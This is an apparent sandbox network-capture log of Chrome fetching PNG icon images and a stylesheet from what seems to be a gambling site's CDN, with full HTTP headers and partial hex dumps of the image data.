                                                                                                                                                          2024-06-09 22:41:25 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 31962
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 22 Feb 2022 09:18:49 GMT
                                                                                                                                                          ETag: "6214aa79-7cda"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE10[6],EU-FRA-paris-GLOBAL1-CACHE16[0,TCP_HIT,4],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465097
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: c81490154fa1cb0bbd35c5035ba635c3
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126903
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 62 30 66 38 62 65 39 30 2c 20 32 30 32 31 2f 31 32 2f 31 35 2d 32 31 3a 32 35 3a 31 35
                                                                                                                                                          Data Ascii: PNGIHDRQjtEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15
                                                                                                                                                          2024-06-09 22:41:26 UTC16195INData Raw: fb 60 c8 ad 2d 59 ee 9f 49 d0 71 51 49 96 a2 43 89 4a 3c 32 ec 9c f2 76 59 4d 2a dd 3d fd 92 35 d9 27 f7 be f6 a7 41 37 74 fd 0f 0f 7d 23 7b 52 e3 a9 70 47 73 6e b9 91 7e aa 09 1b 1e 7b 9a dc 84 07 9d cd fb d1 17 e8 85 d1 68 d1 f2 45 8c 44 28 59 e1 9c 34 11 5d 9d 4d 07 5e 10 b5 e4 25 96 02 c9 ee f5 21 1a 0c 5a 07 8b ba 34 fc 29 3d 52 62 2e 4a 0b 98 d5 09 a1 7f 4f 1f e4 31 35 f0 9e 71 0d 9c 8d 2b e1 db bb 0b 49 85 87 91 93 51 75 e5 0d 48 97 d5 60 e3 aa 1d d8 ba 61 1d ca 47 8d 23 0e 54 80 c9 97 de 0e 77 a2 1b fb 76 ed 24 b9 6c 25 c3 95 40 3a 9e 80 97 ac 12 8b 2c af 6c ea c6 a2 8c 84 29 65 e3 b0 9e c6 d7 de ed cd a8 1d 53 8a 75 bb 9a b1 e9 dd 1d 98 3c bb 0a d2 9b 7f 46 cd 05 d7 40 74 7a d1 b2 e9 43 44 fb 03 f0 d6 5c 7e d4 92 22 8c 74 c7 7d dd b0 15 9d 30 01
                                                                                                                                                          Data Ascii: `-YIqQICJ<2vYM*=5'A7t}#{RpGsn~{hED(Y4]M^%!Z4)=Rb.JO15q+IQuH`aG#Twv$l%@:,l)eSu<F@tzCD\~"t}0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          739192.168.2.55052290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC605OUTGET /pc/image-pc/index/312/nav/fish/06.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 31140
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 22 Feb 2022 09:18:50 GMT
                                                                                                                                                          ETag: "6214aa7a-79a4"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[4],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE8[5],EU-FRA-paris-GLOBAL1-CACHE1[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465097
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 4dc24b7db26046602c67a3b92c50c0bf
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126903
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC15769INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 25 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 62 30 66 38 62 65 39 30 2c 20 32 30 32 31 2f 31 32 2f 31 35 2d 32 31 3a 32 35 3a 31 35
                                                                                                                                                          Data Ascii: PNGIHDRQjtEXtSoftwareAdobe ImageReadyqe<%iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15
                                                                                                                                                          2024-06-09 22:41:25 UTC15371INData Raw: 03 8c 8e 71 b2 57 6b ae cb 7b 40 60 60 51 49 d6 32 a0 71 d4 eb 93 d5 21 4c 9e aa 63 d3 ba 1c 78 c7 f4 14 97 56 e1 b1 7a 7d 06 73 67 47 b0 fa a9 6e 04 c8 7a 48 04 ca 32 59 b6 ea 09 c4 34 5c 11 a5 2c b9 08 ea f1 2c 25 a5 40 fc a1 6b 5b 06 2f e7 75 1c 79 44 12 e1 a8 40 ae 85 64 76 79 22 64 a5 82 2a b9 87 51 82 77 44 f6 df c0 53 97 59 7f 7e f4 37 b7 ee 09 ca d5 9f 77 75 af e5 93 79 43 70 a4 90 04 61 fd 53 cf 8d 0e d9 46 82 63 51 2b 49 11 d1 e8 d9 64 89 75 d2 1b f9 0e b7 51 dd 92 8f f3 1d 30 42 a4 e6 dd 24 b6 47 a2 fc 3e f2 fc b2 c3 c8 7d db 9b 2d fa d0 69 05 11 08 00 09 97 9a b1 52 de cf 5c 0e 17 0d e4 32 ce 9a 53 8b 87 37 74 7b 8f 88 61 5c c5 b2 04 4f 3e 1b 36 81 c5 22 bf cb 46 7f c9 12 b9 02 03 8e df 63 ef 82 eb c5 c5 bd 29 ad 2c 49 2a 44 4a 88 1c b4 e7 8a
                                                                                                                                                          Data Ascii: qWk{@``QI2q!LcxVz}sgGnzH2Y4\,,%@k[/uyD@dvy"d*QwDSY~7wuyCpaSFcQ+IduQ0B$G>}-iR\2S7t{a\O>6"Fc),I*DJ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          740192.168.2.55052390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC605OUTGET /pc/image-pc/index/312/nav/fish/01.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:26 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 33833
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 22 Feb 2022 09:18:49 GMT
                                                                                                                                                          ETag: "6214aa79-8429"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[7],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE10[306],EU-GER-frankfurt-GLOBAL1-CACHE3[0,TCP_HIT,306],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465097
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a496d727ae69984f95c349bda9e1201c
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105855
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:26 UTC15755INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 25 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 62 30 66 38 62 65 39 30 2c 20 32 30 32 31 2f 31 32 2f 31 35 2d 32 31 3a 32 35 3a 31 35
                                                                                                                                                          Data Ascii: PNGIHDRQjtEXtSoftwareAdobe ImageReadyqe<%iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15
                                                                                                                                                          2024-06-09 22:41:26 UTC16384INData Raw: fa ca 52 b4 92 46 0f 71 12 b2 4c 65 48 f3 87 11 25 aa 6c c5 ae 03 f0 f7 7a f0 ee 07 2b e1 09 45 11 f2 f9 88 8c 0f c2 2f d3 98 3e 6e 0c 91 48 93 61 21 96 96 8e 68 02 5f 57 14 ea 2b f4 d0 2d 6e 47 8c 48 ff 60 78 33 96 ef b9 18 d5 ca 90 63 62 37 30 8a da 3c 33 df 51 4d b4 c9 1b 37 da f1 97 d7 12 13 61 c4 45 c9 13 8f ab 34 10 b2 69 c8 44 65 cb a1 81 33 bb b7 6d 1e 34 6b 18 c5 31 08 b3 44 44 93 36 e6 be 29 4e ae 74 cd 19 4a bc af df 36 85 3d b7 27 7d 53 f2 d1 39 2f df 79 e1 b5 7a 58 0b 2b 12 e5 90 27 e9 1b 1d 7c 21 37 b6 77 f5 40 24 77 2f ca 4b 4d 12 cd 84 21 c4 28 a1 ec a4 fd 76 28 16 24 f7 a9 68 5a ea 93 bc 71 b8 bd 1e 68 a5 38 54 66 7d c2 e5 bf 63 c3 4e b4 ac da 00 0b b1 5e 74 44 75 e9 35 1a 98 ad 29 48 2d 28 00 57 94 0f 7e 48 3e 51 43 5a 9c 35 a6 1a 3b f6
                                                                                                                                                          Data Ascii: RFqLeH%lz+E/>nHa!h_W+-nGH`x3cb70<3QM7aE4iDe3m4k1DD6)NtJ6='}S9/yzX+'|!7w@$w/KM!(v($hZqh8Tf}cN^tDu5)H-(W~H>QCZ5;
                                                                                                                                                          2024-06-09 22:41:26 UTC1694INData Raw: 16 b8 d2 35 97 bf b3 a4 62 68 a9 27 dd 0a 5e ee 3e a0 49 b6 d1 f9 73 4e 45 6f ed 9a fd 39 e9 86 96 d3 6f fd 8f c3 69 19 27 8c 78 7f eb ae c5 c7 ef 64 8b 08 c5 59 34 22 21 58 1d 2a 78 41 d3 34 76 e0 8b 1e 09 4b e4 5f 83 b3 9c a0 d5 4a 46 a2 43 e7 5c 2c 70 77 08 47 14 c9 fb f8 01 5d 77 2f c4 64 17 3a 52 27 ac 49 62 16 f0 f5 4a e6 b4 48 a8 a3 b7 a5 d1 5e 60 5a e2 ea 94 a2 d7 8d 2a cd 83 aa 28 c5 bc 20 b5 56 5f f3 12 8b ea e6 c4 35 39 e5 72 9a c1 c7 5c c3 ee aa cc 1b 36 86 d5 bd 2a 14 ad 5c c9 25 77 dc c7 46 78 a9 61 48 59 cd 8a 8f e5 a5 56 b0 59 89 0b ae b9 a3 81 5d 53 a1 ab 35 67 9f cc ce 1f 2d 16 70 7d 89 f4 66 36 14 4b 55 c1 22 86 f9 02 76 4e 5c b0 6b f9 9c d6 c8 16 60 b5 70 0e 94 8c b8 fc f2 1e 23 d9 dd 28 e9 ea b8 b5 2f fe ac 61 f8 cc f3 9a 2b 07 55 3b
                                                                                                                                                          Data Ascii: 5bh'^>IsNEo9oi'xdY4"!X*xA4vK_JFC\,pwG]w/d:R'IbJH^`Z*( V_59r\6*\%wFxaHYVY]S5g-p}f6KU"vN\k`p#(/a+U;


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          741192.168.2.55052490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC605OUTGET /pc/image-pc/index/312/nav/fish/02.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:26 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 33101
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 22 Feb 2022 09:18:49 GMT
                                                                                                                                                          ETag: "6214aa79-814d"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[10],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,10],EU-GER-frankfurt-GLOBAL1-CACHE3[18],EU-GER-frankfurt-GLOBAL1-CACHE1[0,TCP_HIT,17],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465097
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5fed02ee167865b7dbf44348a115e719
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 13151360
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:26 UTC15755INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 25 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 62 30 66 38 62 65 39 30 2c 20 32 30 32 31 2f 31 32 2f 31 35 2d 32 31 3a 32 35 3a 31 35
                                                                                                                                                          Data Ascii: PNGIHDRQjtEXtSoftwareAdobe ImageReadyqe<%iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15
                                                                                                                                                          2024-06-09 22:41:26 UTC16384INData Raw: 1c a6 8c c9 27 c2 aa c0 5f 44 1c 26 9d 22 1e 21 23 de 94 80 59 21 21 af 90 c7 e8 c9 02 5a e9 69 2b 37 4b 90 a3 5d 08 0e 23 4e 11 4c 43 f6 30 d0 32 1a 3c 1e 01 e9 8e 0e 98 49 11 b9 6e 1e 6d db 43 f0 39 3c 44 74 81 ed 5b 16 63 d4 11 c3 90 49 65 b0 e2 f1 38 c2 4b 4c 54 07 1c 28 f1 b3 60 4d 0d e1 34 07 bf 2c a3 7b d3 1a 74 3c fb 32 f2 2f 38 7d bf 01 a6 9d 2c 57 68 d3 73 98 29 bc 4f 2d 92 b0 93 ab 39 72 b5 49 c6 07 c1 48 60 52 fc 1d 6c 59 1b 42 c3 c4 5f a0 5c 1a 98 12 fd d1 4b bf c3 9d af d8 41 7a a3 9b 2f cd c6 c8 0a 5b 6f 7b d3 d4 66 8c 3d a1 ff 0a e9 eb e6 cd 1b 38 d6 62 f2 3c 9f e6 b3 ba c2 68 7b 5a 4f c5 ea 38 07 f5 22 d4 0a f7 ca bd c3 da b6 a3 33 8c 9e c1 e7 de 13 c4 99 6f c1 ba 64 9a 3b b0 ec c7 3f 87 2b 4c 0d 49 c4 73 6c 65 1e da 9b 33 28 2d 17 48 fa
                                                                                                                                                          Data Ascii: '_D&"!#Y!!Zi+7K]#NLC02<InmC9<Dt[cIe8KLT(`M4,{t<2/8},Whs)O-9rIH`RlYB_\KAz/[o{f=8b<h{ZO8"3od;?+LIsle3(-H
                                                                                                                                                          2024-06-09 22:41:26 UTC962INData Raw: 70 9b 89 6e d0 91 28 b6 d5 ec 41 bc 13 f2 9a f5 44 96 bd 3b e5 8c 4b b6 63 90 4d 7b 23 20 b6 5c 85 91 e7 dc 8c 4c f1 8c 2f 3b 75 8a 51 30 f2 47 6e 39 d3 d8 bf e7 96 fe ae 26 4b c4 77 3f 18 08 7d 4b 4f c7 3e 36 45 69 16 ad c9 f1 fd 58 a6 67 77 27 9b c4 08 06 57 73 e8 4d f4 a2 64 ef b2 00 e3 3b bc 76 02 93 dd 19 67 92 57 b6 35 b7 e7 86 d5 3b 6a 9f e1 a7 9c df 70 98 41 8f 00 8d 97 34 c7 32 f6 1a 86 9c 37 e2 8e 05 89 15 16 0f 59 61 d4 4f 87 d8 fc 0e a3 2d ef ee 70 dd d8 de 3c 48 97 30 0e 15 83 92 f0 08 9d c8 19 5f 7a 3a b3 a7 d3 dc 92 d8 b9 b5 e9 93 c7 87 d5 fa b5 ef 7a a2 be 0f c2 b2 e3 17 fe 57 97 da 3b 50 f5 96 b0 04 28 06 18 97 7e d1 44 34 4a 44 4a ea a6 20 47 ab bd cc 15 f9 aa f7 db b1 50 7d e7 0e af 77 c4 4f 19 7c d6 ad cd c4 e7 7a 09 ee ed 18 38 fa 20
                                                                                                                                                          Data Ascii: pn(AD;KcM{# \L/;uQ0Gn9&Kw?}KO>6EiXgw'WsMd;vgW5;jpA427YaO-p<H0_z:zW;P(~D4JDJ GP}wO|z8


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          742192.168.2.55052590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC380OUTGET /pc/image-pc/index/382/slot/icon_user.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC613INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2110
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:16 GMT
                                                                                                                                                          ETag: "64c0a20c-83e"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[3],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE9[4],EU-FRA-paris-GLOBAL1-CACHE3[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063146
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 1dddc4bc1072a0082461d43246e45686
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528854
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC2110INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 05 c7 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66
                                                                                                                                                          Data Ascii: PNGIHDRw=pHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          743192.168.2.5505313.165.113.624434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC376OUTGET /ocs/cc.png?1717972881240 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aka.blackkhaki918.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          744192.168.2.550526183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC563OUTGET /061410/rcenter/common/themes/error.css HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
